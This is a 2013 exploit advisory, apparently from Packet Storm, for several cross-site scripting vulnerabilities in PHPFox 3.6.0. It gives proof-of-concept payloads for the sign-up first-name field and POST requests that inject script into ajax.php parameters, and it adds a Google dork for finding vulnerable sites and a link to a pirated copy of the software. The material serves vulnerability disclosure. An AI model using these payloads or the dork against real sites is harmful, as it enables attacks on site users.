PHPFox version 3.6.0 suffers from multiple cross site scripting vulnerabilities.
3f809c6d313b0f1cdf1b0ef30b006324------------------------------------------------------------
Exploit Title: PHPFox v3.6.0 (build6) Multiple Cross-Site Scripting vulnerabilities
------------------------------------------------------------
Author: #BHG Security Center
Date: Saturday, October 12, 2013
Vendor: http://www.phpfox.com
Software Link: http://dl.nuller.ir/PhpFox.Community.Edition.v3.6.0.Build.6.PHP.NULL-iND%5BNuLLeR.iR%5D.zip
Vulnerable Version(s): v3.6.0.Build.6 is vulnerable.
Tested Version: 3.6.0.Build.6
Vulnerability Type: Cross-Site Scripting
Google Dork: "Powered By PHPFox Version 3.6.0"
Risk Level: High
Saftware Price : 299 $
Tested on: Windows, PHP 5.2
Vulnerability Video : http://www.youtube.com/watch?v=Yw7Wgr4LtGo&feature
-- Vulnerability discovered by: Net.Edit0r ( Dariush Nasirpour) - Email : Black.hat.tm@gmail.com
------------------------------------------------------------
== Proof of concept ==
------------------------------------------------------------
[-] Description :
[-] PoC 1.1: Xss Code Injection Join Field :
1) Xss Code : <script>alert(12)</script>
2- Encode to : <script>alert(12)</script>
3- Put in First name Sign Up
4- After Login get your mouse on Recent Logins
5- and you will see Xss Code was successful
------------------------------------------------------------
Vulnerable File(s):
[+] ajax.php
Vulnerable Parameter(s):
[+] sId
[+] sInput
[+] title
[+] type
[-] PoC 2.2:
## URL encoded POST input ( sId & sInput ) was set to <script>alert(0)</script>
## Request
POST /upload/static/ajax.php HTTP/1.1
=undefined&core[ajax]=true&core[call]=captcha.reload&core
[is_admincp]=0&core[is_user_profile]=0&core[profile_user_id]
=0&core[security_token]=572157ee6d639d835e70475f46a6ef74&sId=[Inject XSS Code]&sInput=[Inject XSS Code]
[-] PoC 3.3:
## URL encoded POST input ( title & type ) was set to " onmouseover=prompt(951977) bad="
## Request
POST /upload/static/ajax.php HTTP/1.1
core[ajax]=true&core[call]=share.popup&core[security_token]=572157ee6d639d835e70475f46a6ef74
&feed_id=1&height=300&is_feed_view=1&sharemodule=event
&title=[Inject XSS Code]&type=[Inject XSS Code]&url=http%3A%2f%2fblack-hg.org%2findex.phpF%26width%3D550
------------------------------------------------------------
Timeline:
------------------------------------------------------------
Advisory Publication: September 18, 2013 [without technical details]
Vendor Notification: September 18, 2013
Public Disclosure: October 12, 2013
#BHG Security Center
# Gr33tz:
# Blackhat Group Members : 3H34N,,G3n3Rall,l4tr0d3ctism,NoL1m1t,b3hz4d
# HUrr!c4nE,E2MA3N,solt6n,Dj.TiniVini
© 2015 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!